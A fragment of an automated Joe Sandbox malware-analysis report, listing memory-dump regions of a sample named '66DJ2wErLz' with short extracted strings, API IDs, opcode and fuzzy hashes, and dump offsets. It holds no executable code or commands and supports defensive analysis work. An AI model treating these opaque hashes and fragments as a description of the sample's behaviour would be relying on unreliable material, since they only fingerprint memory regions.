                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: js{g
                                                                                                                                                                                                                                                      • API String ID: 0-1014319796
                                                                                                                                                                                                                                                      • Opcode ID: 9c18fcfdf183d3e6e2325b026543344db9fcf0b9b7ccceb31fbfaeb5f3b5c64c
                                                                                                                                                                                                                                                      • Instruction ID: 14be18684298a51b6f1365b8eea6b5aba3066a4a8cfe6059be97ad669d3f7baa
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 9c18fcfdf183d3e6e2325b026543344db9fcf0b9b7ccceb31fbfaeb5f3b5c64c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: FF815671650B804BE7398F35C8517ABBBE2AB56718F08895DD4D39BB85C378E406CB44
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: js{g
                                                                                                                                                                                                                                                      • API String ID: 0-1014319796
                                                                                                                                                                                                                                                      • Opcode ID: 2bedd816319602fe80fa94cf924704a6c11e2863fdffa8fa3602250936590e55
                                                                                                                                                                                                                                                      • Instruction ID: be6de47f9550b45d1bd1358da9c634cc281a7da6e29969c5c2308de69db967da
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2bedd816319602fe80fa94cf924704a6c11e2863fdffa8fa3602250936590e55
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 54812571255B804BE7398F35C8517ABBBE6AB52718F08895CD5C39BF95C7B8E406CB00
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                                      • String ID: gfff
                                                                                                                                                                                                                                                      • API String ID: 2994545307-1553575800
                                                                                                                                                                                                                                                      • Opcode ID: edeab19d381afadd31cc405ebd905f0fbf719b22c328d17ebe50dae378019542
                                                                                                                                                                                                                                                      • Instruction ID: c6a45f7a1688543314b9a3a30fef6f223fff4d1289bb41df6adbe344278a34bf
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: edeab19d381afadd31cc405ebd905f0fbf719b22c328d17ebe50dae378019542
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 0F81D2717147418FD325CB39CC50BA6BBE2AB95308F18C57ED096CB7A6EA78A842C744
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                                      • String ID: ihgf
                                                                                                                                                                                                                                                      • API String ID: 2994545307-2948842496
                                                                                                                                                                                                                                                      • Opcode ID: 1de35141843d01284fbd49b4b94197a3011845f6d285c59de9b2ec666c4b6e9d
                                                                                                                                                                                                                                                      • Instruction ID: 39294a001ccb7b60b57bd072fead094b817a0247c43ae1e4845dbb8435dacfda
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 1de35141843d01284fbd49b4b94197a3011845f6d285c59de9b2ec666c4b6e9d
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5B81C274A04201AFD714CF28E881A6BB7F2FF99314F15A52DE5858B3A1DB35EC11CB46
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: ihgf
                                                                                                                                                                                                                                                      • API String ID: 0-2948842496
                                                                                                                                                                                                                                                      • Opcode ID: eef0a356b23e55d2308e20bed1a6a7dcd73da6f3f0547914f9e2b30739e3ef6c
                                                                                                                                                                                                                                                      • Instruction ID: ca5fb8778c0f54cf0ab6f302cb6c0d81cba4e3f114b0412e523e17b97e0fa94b
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eef0a356b23e55d2308e20bed1a6a7dcd73da6f3f0547914f9e2b30739e3ef6c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: B181A2756042019FD715DF28C981AABB7F2EFD9314F19962CE5858B3A1EB31EC81CB42
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: gfff
                                                                                                                                                                                                                                                      • API String ID: 0-1553575800
                                                                                                                                                                                                                                                      • Opcode ID: de86720abe9662384bfc4389f4b275199587a53d7c35c6b33b3c21993df62823
                                                                                                                                                                                                                                                      • Instruction ID: 1fc91bb0a1c041cee60fae72664a40419e7b738dca968d7236cd5d8e294ac405
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: de86720abe9662384bfc4389f4b275199587a53d7c35c6b33b3c21993df62823
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: C271F1B1704B468FD329CF79C850766BBD2AB95304F18C57DC196CB7A6EA78E842C740
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: "
                                                                                                                                                                                                                                                      • API String ID: 0-123907689
                                                                                                                                                                                                                                                      • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                      • Instruction ID: 4b2f630bb6a68757ad0504ce5be77257e5761d12b45ca5ba0373d51c8e5240e3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 22710532B083259BD714CE28E88431BB7E2ABC5710F99852EEC948B391D379DC55878B
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: "
                                                                                                                                                                                                                                                      • API String ID: 0-123907689
                                                                                                                                                                                                                                                      • Opcode ID: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                      • Instruction ID: 4e9db5dd36c18f6bdf1e8e5e9bd0e81cd418d0e8c3977ea520e6bac1bd8197f6
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 08379c2cfec4ee4560f7149afc2674de524dbb751cb7c6d8c58db735b762b861
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D671D332B083598BD714CE29E48071EBBF2ABE5750F29C56DE4989B3D1D235DC498B43
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: DB
                                                                                                                                                                                                                                                      • API String ID: 0-3908451873
                                                                                                                                                                                                                                                      • Opcode ID: 0ddf0731ddfeaa883e7311870e36d02f96856f6d12ce1652dd7f7008e8803fec
                                                                                                                                                                                                                                                      • Instruction ID: 63fe74dcdf674bdd3faef37b2e0283437cd793175f1af46cf0498e51130e9ee1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 0ddf0731ddfeaa883e7311870e36d02f96856f6d12ce1652dd7f7008e8803fec
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: A381B67AF04225CBCB18CF64D8905AEB7B2FFDA710F59806AC841AB355DB349D42CB54
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: LB
                                                                                                                                                                                                                                                      • API String ID: 0-539997225
                                                                                                                                                                                                                                                      • Opcode ID: d02495da20a3f8a7219353459d550f72d20704d827e4251e17801bf690faaf74
                                                                                                                                                                                                                                                      • Instruction ID: 190c79d128488961cfb389f9b0ffad8fedd0031ada35975bf34f4c17adb32e46
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: d02495da20a3f8a7219353459d550f72d20704d827e4251e17801bf690faaf74
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: D1618E31B412228BDB18CF29E8A12FBFBE2EF91310B58466ED4574B3C1D7389941D799
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: Y*>
                                                                                                                                                                                                                                                      • API String ID: 0-3862480330
                                                                                                                                                                                                                                                      • Opcode ID: 22b3804befe7f91e84aca949ffb80fce2ed22dd13d93b44656185de14de2ea60
                                                                                                                                                                                                                                                      • Instruction ID: 90e50e1672eaf7fe8d97f2f09bdb4033b3ef25f85dbdb073c688402916a0328e
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 22b3804befe7f91e84aca949ffb80fce2ed22dd13d93b44656185de14de2ea60
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 4C510573F499814BD72C893C5C223EAAA834BD6234B2DD77BE4B2CB3E4D5698C464345
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: Y*>
                                                                                                                                                                                                                                                      • API String ID: 0-3862480330
                                                                                                                                                                                                                                                      • Opcode ID: 22b3804befe7f91e84aca949ffb80fce2ed22dd13d93b44656185de14de2ea60
                                                                                                                                                                                                                                                      • Instruction ID: 89ecb6df1bbb863ee6a0665ada9a55736774438506404035720d0115086a63e2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 22b3804befe7f91e84aca949ffb80fce2ed22dd13d93b44656185de14de2ea60
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 3D51E433B5D9854BE72C893D5C222BAAA834BD6234B2DC77AD6B1CB3F5D9B94C054340
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: m
                                                                                                                                                                                                                                                      • API String ID: 0-3775001192
                                                                                                                                                                                                                                                      • Opcode ID: 41b4e45d489525032a7ff55d2696e510600e92b2c3d7551ddfae36ad8bd27945
                                                                                                                                                                                                                                                      • Instruction ID: af7c365caf049ce099065ecf3077db2d404c38c6973d98ecc6f2cec00785fd0d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 41b4e45d489525032a7ff55d2696e510600e92b2c3d7551ddfae36ad8bd27945
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 645168B19083848FD720DF25849126FBBE2AFD1304F05892DF5D587392DB39D909CB86
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: w
                                                                                                                                                                                                                                                      • API String ID: 0-2991200456
                                                                                                                                                                                                                                                      • Opcode ID: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                                      • Instruction ID: 72f7098589d43736da4273b9d7e3299e197f10f25cbeea51759b9c2434ba13e7
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 8E4119B6E116558FD704DFA4CC855ABBB72FB88315B1AC1A8C8847B319D77868078BD0
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: w
                                                                                                                                                                                                                                                      • API String ID: 0-2991200456
                                                                                                                                                                                                                                                      • Opcode ID: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                                      • Instruction ID: 760cc357a30abf09427c16280abfc72f6457f95fa7c554f06e8c4f0c02949818
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 6ffcd2417d58e0d1efea5a9724b595c411f337b55a8ae22910b9b44be8581fce
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 6F4146B6E116618FD700DFA4CD855ABBB72FF84314B0AC1A8C8847B31AD77868078BD0
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: ihgf
                                                                                                                                                                                                                                                      • API String ID: 0-2948842496
                                                                                                                                                                                                                                                      • Opcode ID: 2b213d4144a63b266ffc054ecdea8f1b716e225e094351901ee27163bfaa7a7b
                                                                                                                                                                                                                                                      • Instruction ID: b53822568a38529ea4c2b823150fccb38ff3582dc07c8e84d3f18489b2c93ec3
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2b213d4144a63b266ffc054ecdea8f1b716e225e094351901ee27163bfaa7a7b
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: EE31F534304300AFE7209F24DC81BBBF7E5EB9A714F28492CE58697291D671EC92C656
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID: InitializeThunk
                                                                                                                                                                                                                                                      • String ID: ihgf
                                                                                                                                                                                                                                                      • API String ID: 2994545307-2948842496
                                                                                                                                                                                                                                                      • Opcode ID: eabeb2773ff9bbc58c6c2f5a50c7ebc9f6505f28b325af4d1c0bf5b4a04395ef
                                                                                                                                                                                                                                                      • Instruction ID: 0aea9c019cfcbf9c29137c9c12aa4ed540cc4986b7a763f7409eb823f2adcf13
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: eabeb2773ff9bbc58c6c2f5a50c7ebc9f6505f28b325af4d1c0bf5b4a04395ef
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 9831D474308300AFE7109B249CC1B3BF7A6EB8A718F24692EE584A72D1D665EC10875A
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: ihgf
                                                                                                                                                                                                                                                      • API String ID: 0-2948842496
                                                                                                                                                                                                                                                      • Opcode ID: ae411421d2ccc92dd1a2e9f178d6aa2591b1cae486c28fda228ff2e2e7e3843c
                                                                                                                                                                                                                                                      • Instruction ID: 942725d132e371d44a130297a92512d616248c3f0635d3d0ef9998ae1bd18214
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: ae411421d2ccc92dd1a2e9f178d6aa2591b1cae486c28fda228ff2e2e7e3843c
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: E331F874304301BFE7109B24DC81BBBF7E5EB96714F24462CE584A7291D771EC90C656
                                                                                                                                                                                                                                                      Strings
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID: dB
                                                                                                                                                                                                                                                      • API String ID: 0-2104629891
                                                                                                                                                                                                                                                      • Opcode ID: e3ed35eba93c559e2b640e4773887084713877586e1a61965fa59bb2e9adbcdb
                                                                                                                                                                                                                                                      • Instruction ID: 88d28f4539103711ef6104adbc4c901a24cbbd6804f5379e7088d630b29811a1
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: e3ed35eba93c559e2b640e4773887084713877586e1a61965fa59bb2e9adbcdb
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 5DA00129A9E6548AD2119F4494927F0F778E31770AF1438289904AB153D196E950864C
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 7351b713fdd79e4b11a44c2f3e170ae42ed99a1303c69a2fe6fdb41bd9a8d7aa
                                                                                                                                                                                                                                                      • Instruction ID: d6216dced0a3b9436857ee0068e0dff51503e5ecb223af83f8720e1cf69b390d
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 7351b713fdd79e4b11a44c2f3e170ae42ed99a1303c69a2fe6fdb41bd9a8d7aa
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: F02242B56082009FE7149F24EC41B6B73A2FBDB300F55893EF6C487292DA799C41CB4A
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 5a7678f017f308848797c1ab2fc33ccddf339249d7514e43f7e0819896a5eda0
                                                                                                                                                                                                                                                      • Instruction ID: 9c79f7e63c480dd40f7a7ccc60d41b21814d9940eb0dc65dd07d8a453e372cf2
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 5a7678f017f308848797c1ab2fc33ccddf339249d7514e43f7e0819896a5eda0
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: 16120E35204B018FD325CF29C8907A3BBE2EF9A314F19866DD4DA8B795D738E846CB54
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 2cf22539860d374f1b5b70c1f2b7734314ec6e2843ab381a6f5f63b3db803864
                                                                                                                                                                                                                                                      • Instruction ID: b7901f3288d9e4572b9bc57ce4c79cacd886df45a950704f10474c7163005246
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2cf22539860d374f1b5b70c1f2b7734314ec6e2843ab381a6f5f63b3db803864
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: CE52F4715083458FCB14CF18C0806AABFE1BF89315F18867EF8996B391D778EA49CB85
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2375085451.00000000009E0000.00000040.00001000.00020000.00000000.sdmp, Offset: 009E0000, based on PE: false
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_9e0000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
                                                                                                                                                                                                                                                      Similarity
                                                                                                                                                                                                                                                      • API ID:
                                                                                                                                                                                                                                                      • String ID:
                                                                                                                                                                                                                                                      • API String ID:
                                                                                                                                                                                                                                                      • Opcode ID: 2cf22539860d374f1b5b70c1f2b7734314ec6e2843ab381a6f5f63b3db803864
                                                                                                                                                                                                                                                      • Instruction ID: 8d3b1928f7457604ceee89b8ad84da4b75e38aee6a6c9bb0de699d3f22e45387
                                                                                                                                                                                                                                                      • Opcode Fuzzy Hash: 2cf22539860d374f1b5b70c1f2b7734314ec6e2843ab381a6f5f63b3db803864
                                                                                                                                                                                                                                                      • Instruction Fuzzy Hash: BF52C2315083858BCB16CF1AC0946AABBE1BF88314F19CA6DF8D957341D775EE49CB41
                                                                                                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                                                                                                      • Source File: 00000000.00000002.2374816093.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                                                                      • Associated: 00000000.00000002.2374816093.0000000000452000.00000040.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                      • Snapshot File: hcaresult_0_2_400000_66DJ2wErLz.jbxd
                                                                                                                                                                                                                                                      Yara matches
